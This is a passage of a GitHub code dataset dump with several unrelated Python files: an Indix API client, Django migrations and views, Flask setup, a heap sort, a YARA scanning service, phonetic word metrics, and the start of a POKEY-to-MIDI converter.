__str__(self):\n return \"ERROR %s: %s (%s)\" % (self.status, self.msg, self.uri)\n\ndef find_credentials():\n \"\"\"Look in the current environment for indix account creds\"\"\"\n try:\n app_id = os.environ[\"INDIX_APP_ID\"]\n app_key = os.environ[\"INDIX_APP_KEY\"]\n return app_id, app_key\n except:\n return None, None\n\ndef make_request(base_uri, endpoint, **kwargs):\n \"\"\"\n Magic function that makes the actual HTTP request\n Takes first two params to make the url, **kwargs get added as GET request\n \"\"\"\n full_url = \"%s/%s/?\" % (base_uri, endpoint)\n for key, value in kwargs.items():\n full_url = \"%s%s=%s&\" % (full_url, key, value)\n response = requests.get(full_url)\n return response\n\ndef pretty_print(json_to_print, sort_keys=True):\n \"\"\"A little convenience function for pretty pringing of json\"\"\"\n print(json.dumps(json_to_print, sort_keys=sort_keys, indent=4, separators=(',', ': ')))\n\n\nclass IndixRestClient(object):\n \"\"\"\n A client for accessing the indix REST API\n :param str app_id: The app ID\n :param str app_key: The app key\n \"\"\"\n\n def __init__(self, app_id=None, app_key=None, base=\"http://api.indix.com/api\", version=\"beta\"):\n \"\"\"Create a indix REST API client.\"\"\"\n # Get account creds\n if not app_id or not app_key:\n app_id, app_key = find_credentials()\n if not app_id or not app_key:\n raise indixException(\"\"\"You need app_id and app_key when you initialize stuff,\n or add environment variables (see readme)\"\"\")\n\n self.base = base\n self.app_id, self.app_key = app_id, app_key\n self.version_uri = \"%s/%s\" % (base, version)\n\n def brands(self, query=None):\n \"\"\"\n :param query: the brand you want to search for\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"brands\", query=query,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n \n def stores(self, query=None):\n \"\"\"\n :param query: the stores you want to search for\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"stores\", query=query,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def categories(self):\n \"\"\"\n Takes not params. Returns json for all possible catagories\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"categories\",\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def products(self, pageNumber=1, query=\"\", storeId=\"\", brandId=\"\", categoryId=\"\",\n startPrice=\"\", endPrice=\"\", sortBy=\"\", priceHistoryAvail=False):\n \"\"\"\n :param int pageNumber: page number to get\n :param query: product to search for\n :param storeId: storeId, form indix.stores\n :param brandId: brandId, from indix.brands\n :param categoryId: categoryId, from indix.categories\n :param startPrice: low price\n :param endPrice: high price\n :sortBy: must be one of: \"RELEVANCE\", \"PRICE_LOW_TO_HIGH\", \"PRICE_HIGH_TO_LOW\", \"MOST_RECENT\"\n or blank\n :priceHistoryAvail bool: if True, will only return products with price history available\n Returns: request object from requests.get for 10 products\n \"\"\"\n response = make_request(self.version_uri, \"products\", pageNumber=pageNumber, query=query,\n storeId=storeId, brandId=brandId, categoryId=categoryId,\n startPrice=startPrice, endPrice=endPrice, sortBy=sortBy,\n priceHisotryAvail=priceHistoryAvail,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def productById(self, id=None, pageNumber=1):\n \"\"\"\n :param id: productId from indix.products\n :param pageNumber: page number\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"products/%s\" % id, pageNumber=pageNumber,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def pricesById(self, id=None):\n \"\"\"\n :param id: productId from indix.products\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, \"products/%s/prices\" % id,\n app_id=self.app_id, app_key=self.app_key)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n\n def raw(self, endpoint=None, **kwargs):\n \"\"\"\n :param endpoint: the url to all to the end of api.indix.com/api/beta/\n :param **kwargs: dictionary of extra things to add to url as a GET request\n Returns: request object from requests.get\n \"\"\"\n response = make_request(self.version_uri, endpoint,\n app_id=self.app_id, app_key=self.app_key, **kwargs)\n if response.ok:\n return response\n else:\n raise indixRestException(response.status_code, response.url, response.reason)\n","repo_name":"mtbentley/indix","sub_path":"indix.py","file_name":"indix.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25722851379","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AgeGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=45)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='AgeGroupTask',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('age_group', models.ForeignKey(to='bober_tasks.AgeGroup', on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.TextField(null=True)),\n ('label', models.CharField(default=b'', max_length=8, blank=True)),\n ('correct', models.BooleanField(default=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('acronym', models.CharField(max_length=5)),\n ('title', models.CharField(max_length=45)),\n ('description', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='DifficultyLevel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=45)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Remark',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('comment', models.TextField()),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Resources',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('filename', models.CharField(max_length=90)),\n ('type', models.CharField(max_length=40)),\n ('language', models.CharField(max_length=8, choices=[(b'sl', 'Slovenian')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Task',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('international_id', models.CharField(max_length=16)),\n ('interaction_type', models.CharField(max_length=45)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('author', models.CharField(max_length=128, blank=True)),\n ('age_groups', models.ManyToManyField(to='bober_tasks.AgeGroup', through='bober_tasks.AgeGroupTask')),\n ('categories', models.ManyToManyField(to='bober_tasks.Category')),\n ('difficulty_levels', models.ManyToManyField(to='bober_tasks.DifficultyLevel', through='bober_tasks.AgeGroupTask')),\n ('parent', models.ForeignKey(to='bober_tasks.Task', null=True, on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TaskTranslation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=90)),\n ('body', models.TextField()),\n ('solution', models.TextField()),\n ('it_is_informatics', models.TextField(blank=True)),\n ('language_locale', models.CharField(blank=True, max_length=8, null=True,\n choices=[(b'sl', 'Slovenian')])),\n ('comment', models.TextField(null=True)),\n ('version', models.IntegerField(default=1)),\n ('timestamp', models.DateTimeField(auto_now_add=True, null=True)),\n ('correct_answer', models.ForeignKey(to='bober_tasks.Answer', null=True, on_delete=models.CASCADE)),\n ('task', models.ForeignKey(to='bober_tasks.Task', on_delete=models.CASCADE)),\n ('translator', models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='resources',\n name='task',\n field=models.ForeignKey(to='bober_tasks.Task', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='remark',\n name='task_translation',\n field=models.ForeignKey(to='bober_tasks.TaskTranslation', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='remark',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='difficultylevel',\n name='tasks',\n field=models.ManyToManyField(to='bober_tasks.Task', through='bober_tasks.AgeGroupTask'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='answer',\n name='task_translation',\n field=models.ForeignKey(to='bober_tasks.TaskTranslation', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agegrouptask',\n name='difficulty_level',\n field=models.ForeignKey(to='bober_tasks.DifficultyLevel', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agegrouptask',\n name='task',\n field=models.ForeignKey(to='bober_tasks.Task', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agegroup',\n name='tasks',\n field=models.ManyToManyField(to='bober_tasks.Task', through='bober_tasks.AgeGroupTask'),\n preserve_default=True,\n ),\n ]\n","repo_name":"polz113/bober","sub_path":"django/bober/bober_tasks/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"36838784025","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Flask, request\nimport sys\nsys.path.append(os.path.dirname(__file__) + '/..')\nimport config\nfrom config import Config\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nimport logging\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask_mail import Mail\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_babel import Babel, lazy_gettext as _l\nfrom sqlalchemy import MetaData\n\nconvention = {\n \"ix\": 'ix_%(column_0_label)s',\n \"uq\": \"uq_%(table_name)s_%(column_0_name)s\",\n \"ck\": \"ck_%(table_name)s_%(constraint_name)s\",\n \"fk\": \"fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s\",\n \"pk\": \"pk_%(table_name)s\"\n}\n\nmetadata = MetaData(naming_convention=convention)\n\n\n\napp = Flask(__name__)\nbootstrap = Bootstrap(app)\napp.config.from_object(Config)\ndb = SQLAlchemy(app, metadata=metadata)\nmail = Mail(app)\nmigrate = Migrate(app, db)\nmoment = Moment(app)\nbabel = Babel(app)\nlogin = LoginManager(app)\nlogin.login_view = 'login'\nlogin.login_message = _l('Please log in to access this page.')\n\n\n\n\nif not app.debug:\n if app.config['MAIL_SERVER']:\n auth = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n secure = None\n if app.config['MAIL_USE_TLS']:\n secure = ()\n mail_handler = SMTPHandler(\n mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n fromaddr='no-reply@' + app.config['MAIL_SERVER'],\n toaddrs=app.config['ADMINS'], subject='ImportService Failure',\n credentials=auth, secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n if app.config['LOG_TO_STDOUT']:\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.INFO)\n app.logger.addHandler(stream_handler)\n else: \n if not os.path.exists('logs'):\n os.mkdir('logs')\n file_handler = RotatingFileHandler('logs/ImportService.log', maxBytes=10240,\n backupCount=10)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n \n app.logger.setLevel(logging.INFO)\n app.logger.info('ImportService startup')\n\ndef get_locale():\n return request.accept_languages.best_match(app.config['LANGUAGES'])\n\nbabel.init_app(app, locale_selector=get_locale)\n\nwith app.app_context():\n db.create_all()\n\nfrom app import routes, models, errors","repo_name":"ElizavetaWow/TestTasks","sub_path":"ПроКомплаенс/ImportService/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33900010047","text":"from build_max_heap import *\n\ndef heap_sort(A:list):\n heap = Heap.Heap(A)\n build_max_heap(heap)\n n = heap.size\n for i in range(n - 1, 0, -1):\n # Stop when there's only one item in the heap\n A[i], heap.data[0] = heap.data[0], A[i]\n heap.size -= 1\n max_heapify(heap, 0)\n\ndef test_heap_sort():\n A = [16, 14, 10, 8, 7, 9, 3, 2, 4, 1]\n A = [5, 13, 2, 25, 7, 17, 20, 8, 4]\n print(A)\n heap_sort(A)\n print(A)\n\ntest_heap_sort()\n","repo_name":"JasonVann/CLRS","sub_path":"S2_SortingAndOrderStatistics/C6_Heapsort/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9497349559","text":"import yara\nimport os\nfrom models import RequestModel, CustomMatch, CustomStringMatch, CustomStringMatchInstance, \\\n ResponseModel\nimport utils\n\n\ndef analyze_data(obj: RequestModel):\n return ResponseModel(matches=match(obj.rules, obj.data, obj.complete_scan))\n\n\n# configures the yara-rules module and check the data\ndef match(rules: str, data: str, complete_scan: bool):\n response: list[CustomMatch] = []\n # scan using rules in the directory 'ReversingLabs-Yara-Rules'\n if complete_scan:\n rule = yara.compile(filepaths=scan_files())\n matches = rule.match(data=data)\n response += create_iterable_object(matches)\n\n # scan using custom rules sent in the json request\n if rules:\n #return an exception if the rules are not valid\n rule = yara.compile(source=rules)\n matches = rule.match(data=data)\n response += create_iterable_object(matches)\n\n return response\n\n\n# creates a dictionary with all the 'filename': 'filepath' of the rules used from ReversingLabs (\n# https://github.com/reversinglabs/reversinglabs-yara-rules.git)\ndef scan_files():\n path = 'ReversingLabs-Yara-Rules/yara-rules'\n rules_files: dict = {}\n for dir in os.listdir(path):\n for file in os.listdir(path + '/' + dir):\n rules_files.update({os.path.splitext(file)[0]: path + '/' + dir + '/' + file})\n return rules_files\n\n\ndef create_iterable_object(matches_: list[yara.Match]):\n # since the nested object inside yara-rules's response are not serializable, here is the conversion in custom objects\n # the class declarations of these custom objs are in models.py file\n # the original yara-rules objs structure is at https://yara.readthedocs.io/en/stable/yarapython.html\n custom_matches = []\n for x in matches_:\n custom_string_matches = []\n for y in x.strings:\n custom_string_match_instances = []\n\n for z in y.instances:\n custom_string_match_instances.append(\n CustomStringMatchInstance(matched_data=z.matched_data,\n matched_length=z.matched_length,\n offset=z.offset, xor_key=z.xor_key,\n plaintext=utils.yara_string_match_instance_plaintext(z.matched_data,\n z.xor_key)))\n\n custom_string_matches.append(CustomStringMatch(identifier=y.identifier, is_xor=bool(y.is_xor),\n instances=custom_string_match_instances))\n custom_match = CustomMatch(rule=x.rule, meta=str(x.meta), string_match=custom_string_matches)\n custom_matches.append(custom_match)\n\n return custom_matches\n","repo_name":"CiccioGallo13/ThesisProject","sub_path":"YaraVisualizerBackend/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33842489858","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Note, Profile\nfrom .forms import NoteForm\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.views import login_required\nfrom accounts.forms import MyFilter\nfrom django.core.paginator import Paginator, EmptyPage,PageNotAnInteger\n\n# Create your views here.\n\n# <<---------------------------------------------------------------------------------------------------------->>\n# <<------------------------------------------ Correct ------------------------------------------------------->>\ndef home(request):\n user= request.user\n profile = get_object_or_404(Profile, user = user)\n home_notes = Note.objects.all()\n filter = MyFilter(request.GET, queryset=home_notes)\n home_notes = filter.qs\n #<<---------------------------------Pagination--------------------------------------------------------------->>\n p = Paginator(home_notes, 2)\n page = request.GET.get('page')\n try:\n home_notes = p.page(page)\n except PageNotAnInteger:\n home_notes = p.page(1)\n except EmptyPage:\n home_notes = p.num_pages\n\n context = {\n 'home_notes' : home_notes,\n 'profile' : profile,\n 'filter' : filter,\n 'p' : p,\n }\n return render(request, 'home.html', context)\n\n@login_required(login_url='accounts:login')\ndef user_notes(request):\n user=request.user\n user_notes = Note.objects.filter(user=user)\n filter = MyFilter(request.GET, queryset=user_notes)\n user_notes = filter.qs\n profile = get_object_or_404(Profile, user=user)\n context = {\n 'user_notes' : user_notes,\n 'profile' : profile,\n 'filter' : filter,\n }\n return render(request, 'user_notes.html', context)\n\n@login_required(login_url='accounts:login')\ndef one_note(request, slug, one_note_id):\n user = request.user\n profile = get_object_or_404(Profile, user = user)\n one_note = Note.objects.get(slug=slug, pk=one_note_id)\n context = {\n 'one_note' : one_note,\n 'profile' : profile,\n }\n return render(request, 'one_note.html', context)\n@login_required(login_url='accounts:login')\ndef edit_note(request, slug, edit_id):\n user=request.user\n profile = get_object_or_404(Profile, user = user)\n note = get_object_or_404(Note,slug=slug, pk=edit_id)\n if request.method == 'POST':\n form = NoteForm(request.POST, instance=note)\n if form.is_valid():\n new_form = form.save(commit=False)\n new_form.user = request.user\n new_form.save()\n # slug = slug\n # edit_id = note.id\n #url = f\"one_note/{slug}/{edit_id}\"\n return redirect('home:one_note', note.slug, note.id)\n else:\n form = NoteForm(instance=note)\n context = {\n 'form' : form,\n 'profile' : profile,\n }\n return render(request, 'edit_note.html', context)\n@login_required(login_url='accounts:login')\ndef add_note(request):\n user=request.user\n profile = get_object_or_404(Profile, user = user)\n if request.method == 'POST':\n form = NoteForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('/')\n else:\n form = NoteForm()\n context = {\n 'form' : form,\n 'profile' : profile,\n }\n return render(request, 'add_note.html', context)\n# <<---------------------------------------------------------------------------------------------------------->>\n#<<----------------------------------------------------------------------------------------------------------->>\n@login_required(login_url='accounts:login')\ndef profile(request):\n user=request.user\n profile = get_object_or_404(Profile, user = user)\n #profile_notes = Note.objects.filter(user=user)\n context = {\n 'profile' : profile,\n }\n return render(request, 'profile.html', context)\n\ndef delete(request, note_id):\n note = Note.objects.get(pk=note_id)\n if request.method == 'POST':\n note.delete()\n return redirect('/')\n context = {'note' : note,}\n return render(request, 'remove.html', context)","repo_name":"ZakariaBrahimi/Notes__App","sub_path":"Scripts/src/Notes_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13730037738","text":"from copy import deepcopy\n\n\nclass FallbackDictWrapper:\n \"\"\"\n A wrapper for a dict that allows to access values by a stack of keys.\n Used for the theme-config and wherever else it might be useful.\n \"\"\"\n\n def __init__(self, dict, default_stack=None):\n self.dict = dict\n self.default_stack = default_stack\n\n def __getitem__(self, route: str):\n temp_dict = deepcopy(self.dict)\n default_stack = self.default_stack\n ret = None\n stack = None\n key = None\n\n # Preparing strings into lists for easier handling\n if default_stack is None:\n default_stack = []\n if isinstance(default_stack, str):\n default_stack = default_stack.split(\" \")\n elif isinstance(default_stack, list):\n pass\n else:\n raise TypeError(f\"Expected str or list, got {type(default_stack)}\")\n\n if isinstance(route, str):\n stack = route.split(\" \")\n elif isinstance(route, list):\n stack = route\n else:\n raise TypeError(f\"Expected str or list, got {type(route)}\")\n\n key, stack = stack[-1], stack[:-1]\n stack = default_stack + stack\n\n if len(stack) == 0:\n if key in temp_dict:\n ret = temp_dict[key]\n else:\n raise KeyError(f\"Key {key} not found in {temp_dict}\")\n return ret\n\n for d in stack:\n if key in temp_dict:\n ret = temp_dict[key]\n if d in temp_dict:\n temp_dict = temp_dict[d]\n else:\n raise KeyError(f\"Key {d} not found in {temp_dict}\")\n if key in temp_dict:\n ret = temp_dict[key]\n\n return ret\n\n def no_default(self):\n return FallbackDictWrapper(self.dict)\n\n def set_default(self, default_stack):\n self.default_stack = default_stack\n return self\n\n","repo_name":"kaesekarl/manim-slides-setup","sub_path":"src/designs/themes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21698729569","text":"from collections import Counter\nfrom functools import reduce, lru_cache\nfrom random import random\nimport operator\n\nBILABIAL = (0, {'positive': ['labial'], 'negative': ['syllabic']})\nAPICAL = (1, {'positive': ['coronal', 'anterior'], 'negative': ['syllabic']})\nPALATAL = (2, {'positive': ['distributed'], 'negative': ['anterior',\n 'syllabic']})\nVELAR = (3, {'positive': ['dorsal'], 'negative': ['syllabic']})\nGLOTTAL = (4, {'negative': ['labial', 'syllabic', 'coronal', 'dorsal']})\n\nFRONT = (5, {'positive': ['front'], 'negative': ['back']})\nCENTRAL = (6, {'negative': ['front', 'back']})\nBACK = (7, {'positive': ['back'], 'negative': ['front']})\n\nPHONETIC_CONSTANTS = [BILABIAL, APICAL, PALATAL, VELAR, GLOTTAL, FRONT,\n CENTRAL, BACK]\n\nLIQUID = {'positive': ['consonantal', 'approximant']}\nRHOTIC_VOWEL = {'positive': ['syllabic', 'coronal', 'anterior', 'distributed'],\n 'negative': ['strident']}\nFRICATIVE_OR_AFFRICATE = {'positive': ['delayedrelease']}\nVOICED = {'positive': ['voice']}\n\n\n@lru_cache(maxsize=None)\ndef classify_segment(segment):\n '''Given a segment, return all phonetic constants which apply to it, in a\n list.'''\n return [constant[0] for constant in PHONETIC_CONSTANTS if\n segment.meets_conditions(constant[1])]\n\n\ndef phonetic_product(word):\n '''Given a word, compute the Phonetic Product outlined by Harold R. Bauer in\n \"The ethologic model of phonetic development: I. Phonetic contrast\n estimators\" (1988).\n\n '''\n\n # Count all applicable features in the word.\n features = []\n for segment in word.segments:\n features.extend(classify_segment(segment))\n\n feature_count = Counter(features)\n\n # Multiply the counts together, adding one to each count. The initial value\n # is one in case of words with no special features.\n return reduce(operator.mul, map(lambda x: x + 1, feature_count.values()),\n 1)\n\n\ndef weighted_phonetic_product(word):\n '''Given a word, compute the Phonetic Product outlined by Harold R. Bauer in\n \"The ethologic model of phonetic development: I. Phonetic contrast\n estimators\" (1988), using weighted values by Carterette and Jones in\n \"Informal Speech: Alphabetic and Phonetic Texts with Statistical Analyses\n and Tables\" (1974).\n\n '''\n\n # Count all applicable features in the word.\n features = []\n for segment in word.segments:\n features.extend(classify_segment(segment))\n\n feature_count = Counter(features)\n\n segment_types = [feature_count[0] * 0.1658 + 1,\n feature_count[1] * 0.3149 + 1,\n feature_count[2] * 0.01129 + 1,\n feature_count[3] * 0.04945 + 1,\n feature_count[4] * 0.04945 + 1,\n feature_count[5] * 0.18 + 1,\n feature_count[6] * 0.1431 + 1,\n feature_count[7] * 0.0709 + 1]\n\n return reduce(operator.mul, segment_types)\n\n\ndef number_of_syllables(word):\n '''Given a word, compute the number of syllables it contains.'''\n CV_syllable_rule = {'before': {'negative': ['syllabic']},\n 'conditions': {'positive': ['syllabic']}}\n\n VC_syllable_rule = {'after': {'negative': ['syllabic']},\n 'conditions': {'positive': ['syllabic']}}\n\n syllables = 0\n\n for index in range(len(word.segments)):\n is_CV_syllable = word.index_applicable(index, CV_syllable_rule)\n is_VC_syllable = word.index_applicable(index, VC_syllable_rule)\n\n if is_VC_syllable or is_CV_syllable:\n syllables += 1\n\n return syllables\n\n\ndef number_of_consonant_clusters(word):\n '''Given a word, compute the number of consonant clusters it contains.'''\n cluster_rule = {'before': {'positive': ['consonantal']},\n 'conditions': {'positive': ['consonantal']},\n 'after': {'negative': ['consonantal']}}\n\n return len([index for index in range(len(word.segments))\n if word.index_applicable(index, cluster_rule)])\n\n\ndef word_complexity_measure(word):\n '''Given a word, compute the Word Complexity Measure outlined by Carol\n Stoel-Gammon in \"The Word Complexity Measure: Description and application\n to developmental phonology and disorders\" (2010).\n\n '''\n WCM_score = 0\n\n if number_of_syllables(word) > 2:\n WCM_score += 1\n\n if 'consonantal' in word.segments[-1].positive:\n WCM_score += 1\n\n WCM_score += number_of_consonant_clusters(word)\n\n for segment in word.segments:\n if segment.meets_conditions(VELAR[1]):\n WCM_score += 1\n elif segment.meets_conditions(LIQUID):\n WCM_score += 1\n elif segment.meets_conditions(RHOTIC_VOWEL):\n WCM_score += 1\n elif segment.meets_conditions(FRICATIVE_OR_AFFRICATE):\n WCM_score += 1\n if segment.meets_conditions(VOICED):\n WCM_score += 1\n\n return WCM_score\n\n\ndef random_value(word):\n '''Given a word, return a random value.'''\n return random()\n","repo_name":"kdelwat/Onset","sub_path":"engine/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"31"} +{"seq_id":"41650516058","text":"'''\n\tPOKEY2MIDI v0.86\n\tby LucasVB (http://1ucasvb.com/)\n\t\n\tDescription:\n\t\tThis program converts POKEY data dumps from asapscan into MIDI files\n\t\tasapscan is part of the ASAP (Another Slight Atari Player) software package\n\t\n\tASAP site: http://asap.sourceforge.net\n\tFor usage, run: python pokey2midi -h\n\t\n\t-------\n\t\n\tTODO:\n\t\tPercussion maps\n\t\t\tDoesn't seem to be working on Sweet, considering the old MIDI\n\t\t\tSome weird poly 0? seems to be ignored\n\t\t\tAny song with Poly 2 & 3?\n\t\tPerhaps use helicopter/seashore instead?\n\t\tVerify 16-bit\n\t\t\n\t\tHandle poly periods properly, check emulator\n\t\tVerify highpass behavior\n\t\t\n\t\tMap noise poly to GM instruments\n\t\t\tMight need to fine-tune frequency range?\n\t\t\tWhat about percussions?\n\t\t\n\t\tOption to ignore all volume information and merge notes maximally?\n\t\t\n\t\tSuppress duplicate channels?\n\t\t\tIf channels have the exact same content, kill duplicates\n\t\t\tHelps with cleanup\n'''\n\nimport os\nimport re\nimport bz2\nimport math\nimport struct\nimport argparse\nimport mimetypes\n\n# Constants\nVERSION\t\t\t\t= \"0.85\"\nNTSC\t\t\t\t= 0\nPAL\t\t\t\t\t= 1\nNOTES\t\t\t\t= ['A','A#','B','C','C#','D','D#','E','F','F#','G','G#']\nDT_NTSC\t\t\t\t= 262 * 114 / 1789772.5 # time between NTSC frames\nDT_PAL\t\t\t\t= 312 * 114 / 1773447.0 # time between PAL frames\nFPS_NTSC\t\t\t= 59.94\nFPS_PAL\t\t\t\t= 50\n\n# Settings\nDEFAULT_TIMEBASE \t= 480\nDEFAULT_TEMPO \t\t= 60\nBPM_COUNT_THRESHOLD\t= 20 # Minimum number of intervals to run tempo detector\nBPM_NOTE_THRESHOLD\t= 60 # 60 = Middle C\nFPB_LIMITS\t\t\t= [10,100] # frames per beat (300 to 30 bpm)\n\n# Debug contants\nENABLE_16BIT\t\t= True # Enable 16bit?\nDEBUG\t\t\t\t= False # Internal debug\nDEBUG_POLYS\t\t\t= False # Also write non-tonal polys (0-4) notes as given by AUDF\n\n# TODO: find the rest\n# 0 = white noise, cymbal?\n# 2 = low buzz when high freq, helicopter for low freq?\n# 4 = pink noise, seashore?\n# Use negative values for percussion map? (MIDI channel 9)\nPOLY_INSTRUMENT\t\t= [0,0,0,0,0,80,81,80]\n\n# Human-readable POKEY state and other goodies\nclass POKEY(object):\n\tdef __init__(self, number, mode):\n\t\tself.mode = mode\n\t\t# Per-channel data\n\t\tself.audf\t\t\t= [0,0,0,0] # channel frequency data\n\t\tself.vol\t\t\t= [0,0,0,0] # channel volumes\n\t\tself.volctrl\t\t= [0,0,0,0] # volume-only mode (used for PCM digital audio)\n\t\tself.poly\t\t\t= [0,0,0,0] # channel polynomial counter data\n\t\t# AUDCTL flags\n\t\tself.use15khz\t\t= False\n\t\tself.highpass2w4\t= False\n\t\tself.highpass1w3\t= False\n\t\tself.join4and3\t\t= False\n\t\tself.join2and1\t\t= False\n\t\tself.clock3mhz\t\t= False\n\t\tself.clock1mhz\t\t= False\n\t\tself.poly17as9\t\t= False\n\t\t\n\t\tself._state\t\t= dict() # internal state\n\t\tself.number\t\t= number # POKEY number\n\t\n\t\t\n\t# The availalbe clock frquencies in Hz\n\t@property\n\tdef CLOCK_MHz(self):\n\t\treturn 1789772.5 if self.mode == NTSC else 1773447.0\n\t\n\t@property\n\tdef CLOCK_64kHz(self): # TODO: verify these PAL values\n\t\treturn 63921.0 if self.mode == NTSC else 63921.0\n\t\n\t@property\n\tdef CLOCK_15kHz(self): # TODO: verify these PAL values\n\t\treturn 15699.9 if self.mode == NTSC else 15699.0\n\t\n\tdef write(self, data): # Write data to POKEY chip\n\t\tself.writeAUDF(1, data[0])\n\t\tself.writeAUDC(1, data[1])\n\t\tself.writeAUDF(2, data[2])\n\t\tself.writeAUDC(2, data[3])\n\t\tself.writeAUDF(3, data[4])\n\t\tself.writeAUDC(3, data[5])\n\t\tself.writeAUDF(4, data[6])\n\t\tself.writeAUDC(4, 